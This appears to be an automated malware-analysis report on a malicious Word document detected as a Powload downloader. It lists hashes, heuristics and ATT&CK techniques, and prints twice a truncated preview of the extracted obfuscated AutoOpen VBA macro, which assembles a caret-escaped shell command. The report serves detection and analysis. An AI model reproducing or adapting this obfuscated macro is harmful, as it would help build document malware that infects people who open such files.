Office (OLE) malware analysis — malicious · 0daef21240d620d0

MALICIOUS

Office (OLE)

192.8 KB Created: 2018-09-25 22:07:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 82e45ac2a8477e6ac0d4c371eb727f0a SHA-1: f545b056d548947cff6e3d1dba19bcd1aa4cf29c SHA-256: 0daef21240d620d0560a464273ef4d6ddffb954d555e123d21daa38ecf97ab71

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic AutoOpen macro, which is a critical indicator of malicious intent. This macro utilizes a Shell() call, a common technique for downloading and executing secondary payloads. The document also includes a lure for password-protected archives, suggesting a multi-stage attack. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Downloader.Powload-6697736-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Powload-6697736-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 208591 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	208591 bytes
SHA-256: `78c0a421c2aade23db7a538b6edd8f6285b8aa22789e95c4127a707cd9705560`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XvbVAwkLBJJKi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim suCzA(1) suCzA(0) = MidB(zVCafC + ZoChRjhHREUNihb + CtIGW, 181, 379) + MidB(aXwMmM + WWTLMvvZOfITsqDfjwLHl + jtGKUH, 565, 365) Dim LLoiP(2) LLoiP(0) = MidB(KCYfzu + ciunNWBjpzUCGkpFSbik + EaoPkmjz, 805, 512) + MidB(YdLpJIt + TDQvvKplzuhuJTiCPUMjCwL + dSWqwzlX, 447, 387) LLoiP(1) = Right(uOEcpAd + HXMrAZGWzjwuISkzXvL + ZVGHD, 247) + MidB(rCVuJzw + AIUFdzGBmPjwwwRfTwT + AHsmY, 353, 81) Dim SZvcu(1) SZvcu(0) = Right(VuIhufp + CCiibMaULTmaHSNLHIzwj + wtwiM, 642) + Mid(faukiGz + jYrumwUSiJZCFaNhcpzl + brqpiFIo, 857, 255) + Left(GLDBK + oDdVvEsSrRCzLwGij + kJsnb, 378) + Right(bfFizuz + niMqwbdYJzEvfnSTcHak + QmiDCCNb, 219) Dim rqzZER(2) rqzZER(0) = MidB(obRpaj + UBCwEahzMpwVcabTFMw + XpNLk, 307, 796) + Mid(oLjwZ + QQZsbATrpOIpXzwY + PwjWnu, 632, 191) + Left(ACJowXL + otTvBqswnmzAJTqVoN + qLOwG, 386) + Mid(lXJaZ + ijBBiOiztRmqmCUkck + fYFnAcri, 355, 122) rqzZER(1) = Right(pnLln + OCphRTvHGoSPvmdiNBILz + ZAzqi, 939) + MidB(Yqqro + rjbdnMCRiIfFrqAI + lQYrSMWv, 607, 717) Dim qzlOJ(1) qzlOJ(0) = Right(ivWJkOVR + wkAqApOqqkwquhZCYtsZEhij + iozvli, 905) + MidB(qKXXP + kEcbLLVdwDLWIUbL + CFPmPqf, 717, 21) Dim BiICO(1) BiICO(0) = MidB(MPfLfvXz + RRaZRnTMQTItUjvSL + wDnSR, 831, 110) + Right(SGcJp + kfViBEcfXRKMbfHTXlwl + kLAYIz, 81) + Mid(LmqKH + FntZuPdMMBWzvluRtbJWY + KQsDF, 994, 484) + MidB(LrWTUiN + zhBHZsRqAzwQVMjFJHBzBQZD + wKOza, 512, 604) Dim HKYjV(1) HKYjV(0) = Mid(NzhIZ + YSzzrfaFTDlVGmzTsHVh + HDjwEI, 967, 10) + Left(EwfuJmzE + jXNYrvKzdClscuNBKEl + lKGDJ, 105) SYRWVYAT (KeyString(spwcKwvo + iTCVijDT + 9 + 5 + 0 + 0 + 53 + iHvOmo + XfAhwHwO) + lOMwk + aDombZzz + KeyString(ktkqV + RowAU + 10 + 6 + 0 + 0 + 61 + UAAizC + cQLkaH) + bRvBKV + zzPXmt + wONzpQ + ArntsYhXKki + iMMOVw + jBPaQlG + JTKRkUHdtnV + UkhphDQP + zCOWjqHaB + zrcHBiVwjn + FiJzrdqQpq + tjlwWPFOt + iLQizmp + wmtCfln + alkqIFJ + BElSDBKh) Dim CubzjJ(1) CubzjJ(0) = Mid(oHztSlJ + zmlIsMNkSSGFscMhwnAjV + quHlzJ, 737, 164) + Left(GbJiONAr + jPUjrXSFzFPiYczSJUw + GzEzkaz, 801) End Sub Attribute VB_Name = "kaZatch" Function bRvBKV() oCLkqfXwL = "d" + " " + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "V" + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "C" + CStr(Chr(5 + 5 + 4 + 1 + 19)) + "s" + "^" + "e^" + "t" + " +" + "{^" kTOtiwAiowv = ",^" + "'" + "=^" + "51" + "9" + " ^" + "9" + "3" + "^" + "1" + " " + "^3" vQWHpYvmjf = "5^" + "1" + "^" + " " + "1" Dim dwTiD(2) dwTiD(0) = MidB(iIHTYfbX + IkmBGjiOIbsEfPkhAknrb + MloLsJn, 837, 876) + MidB(KWNlQEs + DcDnzOOdUsLjUZnPRFNlh + qvPTjz, 73, 547) dwTiD(1) = Right(hANdvJf + bbBrnrQckqqWpTNtlsH + lPYalWv, 654) + Mid(WuoEcbTW + rtLKlGbwnzTUPFYqjpIdiSj + lRRVJP, 906, 843) Dim hNHQqh(1) hNHQqh(0) = MidB(PTbsi + KWFaVjVjwKGuPnKQukQfA + scHtB, 792, 30) + Mid(TcwLwc + BDmbpILshiJuUPqsZ + UENqUhSo, 35, 353) JllGShdhcmR = "^" + "53" + "^" + " " + "1^" + "59" + "^ " + "1" + "^" + "0" + "9" + " ^" + "09" + "3 " OtsGHtEk = "^" + "1" + "^0" + "5" + "^ " + "^1" + "0" + "9 " + "91" + "0 " + "1^" + "0^" + "9^" tHCzj = " ^" + "3" + "0" + "1" + " " + "^" Dim fuzwZt(2) fuzwZt(0) = MidB(ZwDIcjN + QjrFXLKVcKFUNCKppM + PGJQiIp, 798, 914) + MidB(bXVjI + bDRsVFljaVYNWcwNvcLjm + HmzjTCGB, 703, 27) + MidB(kEfzFO + zqPbtknMQWfidzUHTSLlK + OJPdF, 352, 350) + Right(RWVpjGSo + osHGjNkBEnEFVmYiKEMm + cQiYMzX, 342) fuzwZt(1) = Left(MHCiPVL + GNRVANUuJabGXzGipE + ZNcOjpS, 802) + MidB(wdSLudKr + IELGjbSOcbipaYzlFm + fHuIsCc, 452, 956) + Left(dVCWiIKA + TQnsUmLFzipwpTmQmF + qwWFCUd, 889) + MidB(SLrGPXQW + AUowXXpoknKphwjCrcFrwE + iDOzQ, 873, 735) Dim HXifi(2) HXifi(0) = Mid(CEHWKJ + jUUPudrDQHlJkXRbnawXMoj + wzzYjoQv, 483, 442) + Left(QciOXDMS + SLijzkwHKozwGTiTcsjKi + TIpkXWLG, 583) + MidB(CofwRvdD + XvoBrwEmBzJCRnRRoschszj + akjiGTv, 263, 23) + Right(XGIsjqt + KAEplcvNwCKLbUVCjV + IHuhjk, 962) HXifi(1) = Right(tZSaf ... (truncated)

SHA-256: 78c0a421c2aade23db7a538b6edd8f6285b8aa22789e95c4127a707cd9705560

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XvbVAwkLBJJKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim suCzA(1)
suCzA(0) = MidB(zVCafC + ZoChRjhHREUNihb + CtIGW, 181, 379) + MidB(aXwMmM + WWTLMvvZOfITsqDfjwLHl + jtGKUH, 565, 365)
   Dim LLoiP(2)
LLoiP(0) = MidB(KCYfzu + ciunNWBjpzUCGkpFSbik + EaoPkmjz, 805, 512) + MidB(YdLpJIt + TDQvvKplzuhuJTiCPUMjCwL + dSWqwzlX, 447, 387)
LLoiP(1) = Right(uOEcpAd + HXMrAZGWzjwuISkzXvL + ZVGHD, 247) + MidB(rCVuJzw + AIUFdzGBmPjwwwRfTwT + AHsmY, 353, 81)
   Dim SZvcu(1)
SZvcu(0) = Right(VuIhufp + CCiibMaULTmaHSNLHIzwj + wtwiM, 642) + Mid(faukiGz + jYrumwUSiJZCFaNhcpzl + brqpiFIo, 857, 255) + Left(GLDBK + oDdVvEsSrRCzLwGij + kJsnb, 378) + Right(bfFizuz + niMqwbdYJzEvfnSTcHak + QmiDCCNb, 219)
   Dim rqzZER(2)
rqzZER(0) = MidB(obRpaj + UBCwEahzMpwVcabTFMw + XpNLk, 307, 796) + Mid(oLjwZ + QQZsbATrpOIpXzwY + PwjWnu, 632, 191) + Left(ACJowXL + otTvBqswnmzAJTqVoN + qLOwG, 386) + Mid(lXJaZ + ijBBiOiztRmqmCUkck + fYFnAcri, 355, 122)
rqzZER(1) = Right(pnLln + OCphRTvHGoSPvmdiNBILz + ZAzqi, 939) + MidB(Yqqro + rjbdnMCRiIfFrqAI + lQYrSMWv, 607, 717)
   Dim qzlOJ(1)
qzlOJ(0) = Right(ivWJkOVR + wkAqApOqqkwquhZCYtsZEhij + iozvli, 905) + MidB(qKXXP + kEcbLLVdwDLWIUbL + CFPmPqf, 717, 21)
   Dim BiICO(1)
BiICO(0) = MidB(MPfLfvXz + RRaZRnTMQTItUjvSL + wDnSR, 831, 110) + Right(SGcJp + kfViBEcfXRKMbfHTXlwl + kLAYIz, 81) + Mid(LmqKH + FntZuPdMMBWzvluRtbJWY + KQsDF, 994, 484) + MidB(LrWTUiN + zhBHZsRqAzwQVMjFJHBzBQZD + wKOza, 512, 604)
   Dim HKYjV(1)
HKYjV(0) = Mid(NzhIZ + YSzzrfaFTDlVGmzTsHVh + HDjwEI, 967, 10) + Left(EwfuJmzE + jXNYrvKzdClscuNBKEl + lKGDJ, 105)
SYRWVYAT (KeyString(spwcKwvo + iTCVijDT + 9 + 5 + 0 + 0 + 53 + iHvOmo + XfAhwHwO) + lOMwk + aDombZzz + KeyString(ktkqV + RowAU + 10 + 6 + 0 + 0 + 61 + UAAizC + cQLkaH) + bRvBKV + zzPXmt + wONzpQ + ArntsYhXKki + iMMOVw + jBPaQlG + JTKRkUHdtnV + UkhphDQP + zCOWjqHaB + zrcHBiVwjn + FiJzrdqQpq + tjlwWPFOt + iLQizmp + wmtCfln + alkqIFJ + BElSDBKh)
   Dim CubzjJ(1)
CubzjJ(0) = Mid(oHztSlJ + zmlIsMNkSSGFscMhwnAjV + quHlzJ, 737, 164) + Left(GbJiONAr + jPUjrXSFzFPiYczSJUw + GzEzkaz, 801)
End Sub


Attribute VB_Name = "kaZatch"
Function bRvBKV()
oCLkqfXwL = "d" + " " + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "V" + CStr(Chr(7 + 8 + 7 + 2 + 23)) + "C" + CStr(Chr(5 + 5 + 4 + 1 + 19)) + "s" + "^" + "e^" + "t" + " +" + "{^"
kTOtiwAiowv = ",^" + "'" + "=^" + "51" + "9" + " ^" + "9" + "3" + "^" + "1" + " " + "^3"
vQWHpYvmjf = "5^" + "1" + "^" + " " + "1"
Dim dwTiD(2)
dwTiD(0) = MidB(iIHTYfbX + IkmBGjiOIbsEfPkhAknrb + MloLsJn, 837, 876) + MidB(KWNlQEs + DcDnzOOdUsLjUZnPRFNlh + qvPTjz, 73, 547)
dwTiD(1) = Right(hANdvJf + bbBrnrQckqqWpTNtlsH + lPYalWv, 654) + Mid(WuoEcbTW + rtLKlGbwnzTUPFYqjpIdiSj + lRRVJP, 906, 843)
   Dim hNHQqh(1)
hNHQqh(0) = MidB(PTbsi + KWFaVjVjwKGuPnKQukQfA + scHtB, 792, 30) + Mid(TcwLwc + BDmbpILshiJuUPqsZ + UENqUhSo, 35, 353)
JllGShdhcmR = "^" + "53" + "^" + " " + "1^" + "59" + "^ " + "1" + "^" + "0" + "9" + " ^" + "09" + "3 "
OtsGHtEk = "^" + "1" + "^0" + "5" + "^ " + "^1" + "0" + "9 " + "91" + "0 " + "1^" + "0^" + "9^"
tHCzj = " ^" + "3" + "0" + "1" + " " + "^"
Dim fuzwZt(2)
fuzwZt(0) = MidB(ZwDIcjN + QjrFXLKVcKFUNCKppM + PGJQiIp, 798, 914) + MidB(bXVjI + bDRsVFljaVYNWcwNvcLjm + HmzjTCGB, 703, 27) + MidB(kEfzFO + zqPbtknMQWfidzUHTSLlK + OJPdF, 352, 350) + Right(RWVpjGSo + osHGjNkBEnEFVmYiKEMm + cQiYMzX, 342)
fuzwZt(1) = Left(MHCiPVL + GNRVANUuJabGXzGipE + ZNcOjpS, 802) + MidB(wdSLudKr + IELGjbSOcbipaYzlFm + fHuIsCc, 452, 956) + Left(dVCWiIKA + TQnsUmLFzipwpTmQmF + qwWFCUd, 889) + MidB(SLrGPXQW + AUowXXpoknKphwjCrcFrwE + iDOzQ, 873, 735)
   Dim HXifi(2)
HXifi(0) = Mid(CEHWKJ + jUUPudrDQHlJkXRbnawXMoj + wzzYjoQv, 483, 442) + Left(QciOXDMS + SLijzkwHKozwGTiTcsjKi + TIpkXWLG, 583) + MidB(CofwRvdD + XvoBrwEmBzJCRnRRoschszj + akjiGTv, 263, 23) + Right(XGIsjqt + KAEplcvNwCKLbUVCjV + IHuhjk, 962)
HXifi(1) = Right(tZSaf
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.